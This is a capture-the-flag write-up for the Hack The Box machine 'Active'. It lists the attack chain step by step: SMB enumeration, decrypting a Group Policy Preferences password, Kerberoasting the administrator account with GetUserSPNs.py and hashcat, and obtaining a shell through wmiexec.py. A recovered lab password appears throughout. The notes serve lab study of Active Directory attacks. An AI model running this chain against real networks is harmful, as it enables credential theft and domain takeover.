ACTIVE

Topics will be covered

• SMB enumeration techniques

• Group Policy Preferences enumeration and exploitation

• Identification and exploitation of Kerberoastable accounts

Enumeration and Exploiting tools:

    - Nmap
        nmap -Pn -sV -sC  10.10.10.100
    - SMB
        smbclient -L //10.10.10.100
        smbmap -H 10.10.10.100
        smbclient //10.10.10.100/Replication
    - Foothold (First successful breach/Limited access/Starting point)
        ○ Group Policy Preferences
    - Authenticated Enumeration
        ○ smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100
        ○ smbclient -U SVC_TGS%GPPstillStandingStrong2k18 //10.10.10.100/Users
    - Privilege Escalation
        ○ ldapsearch -x -H 'ldap://10.10.10.100' -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(! (useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName
        ○ GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
    - Kerberoasting
        ○ ldapsearch -x -H 'ldap://10.10.10.100' -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(! (useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName
        ○ GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100
        ○ GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request
    - Cracking of Kerberos TGS Hash 
        ○ hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt --force --potfile-disable 
    - Shell as Primary Domain Admin 
wmiexec.py active.htb/administrator:[email protected]

Namp

Understanding the SMB share ports

• Understanding the LDAP ports | Port | Protocol |Service | Description | |389 | Lightweight Directory Access Protocol (LDAP) | ldap | Used for accessing and maintaining distributed directory information services | |636 | LDAP over SSL (LDAPS) | ldaps | Secure version of LDAP using SSL/TLS encryption | |3268 | Global Catalog (LDAP) | gc | Provides a read-only replica of the Active Directory database for faster searches | |3269 | Global Catalog over SSL (LDAPS) | gc-ssl | Secure version of the Global Catalog using SSL/TLS encryption |

• Microsoft Active Directory-Specific Ports

• Additional LDAP-Related Ports

• Ports Used in LDAP Attacks

• When performing penetration testing or security assessments, these ports are critical:

• Now lets come back to the nmap results and found smb ports are availible(Port 445 is open)

• But guest user is not available but smb signing is happening

• So lets try smbclient with available shares and login with anonymous this time

• Since anonymous login is allowed, we can view a list of available shares.

• Let's now use smbmap to identify which of these shares are accessible with anonymous credentials.

• Lets login with anonymous to replication share, and there I can find the active.htb folder and then there are subfolder in it as follows

• To do Multifolder search at the same time in smd we can use the command

• Since the files are donloaded to kali, now lets try to open the each folder and search.

• After opening the Group.xml file we can see below

• Note:Group Policy Preferences

• Group Policy Preferences (GPP) was introduced in Windows Server 2008, it allowed administrators to modify users and groups across their network.

• The defined password was AES-256 encrypted and stored in Groups.xml .

• However, at some point in 2012, Microsoft published the AES key on MSDN,

• meaning that passwords set using GPP are now able to crack and considered low-hanging fruit.

• For cracking the AES-256 encrypted - we will use gpp-decrypt tool

• I don’t have this tool installed in kali so downloaded it using : sudo apt install gpp-decrypt

• Now lets try to map the files that are accessible for SVC_TGS and then we will login

• After searching the directory of SVC_TGS user we found the user.txt in his desktop folder and downloaded

• Note: UserAccountControl

• stores settings for each user account (like "Is the account disabled?" or "Does the user need a password?").

• Each setting is represented by a number code (e.g., 2 = disabled account).

• Kerbrosting---> is basically Request a TGS Ticket The attacker requests a Ticket Granting Service (TGS) ticket for the service (no admin rights needed). The TGS is encrypted with the service account’s NTLM hash. Extract the TGS Hash The attacker exports the ticket in John-the-Ripper or Hashcat format.

• With the new ldap search filter of serviceprincipalname will search for the possibility of users that can send a TGS

In the previous command we got the administrator is available as active user. since we can see the serviceprincipleName is active on port 445. we can make a service request now.

• Lets reconform with the tool called GetUserSPNs.py and check weather the same result is happening or not.

• Since it is conforming the same results.

• so now we can make a request to DC for a service request possibility.

• Now save the ntlm hash into a file and try john or hashcat to decrypt the hash as below

• Finally got some credentials (password ) for adminstrator.

• Lets try login with one of the impack tool called wmiexec.py

• We have tried login using evil-winrm but it is not working, so we are going with impackts wmiexex.py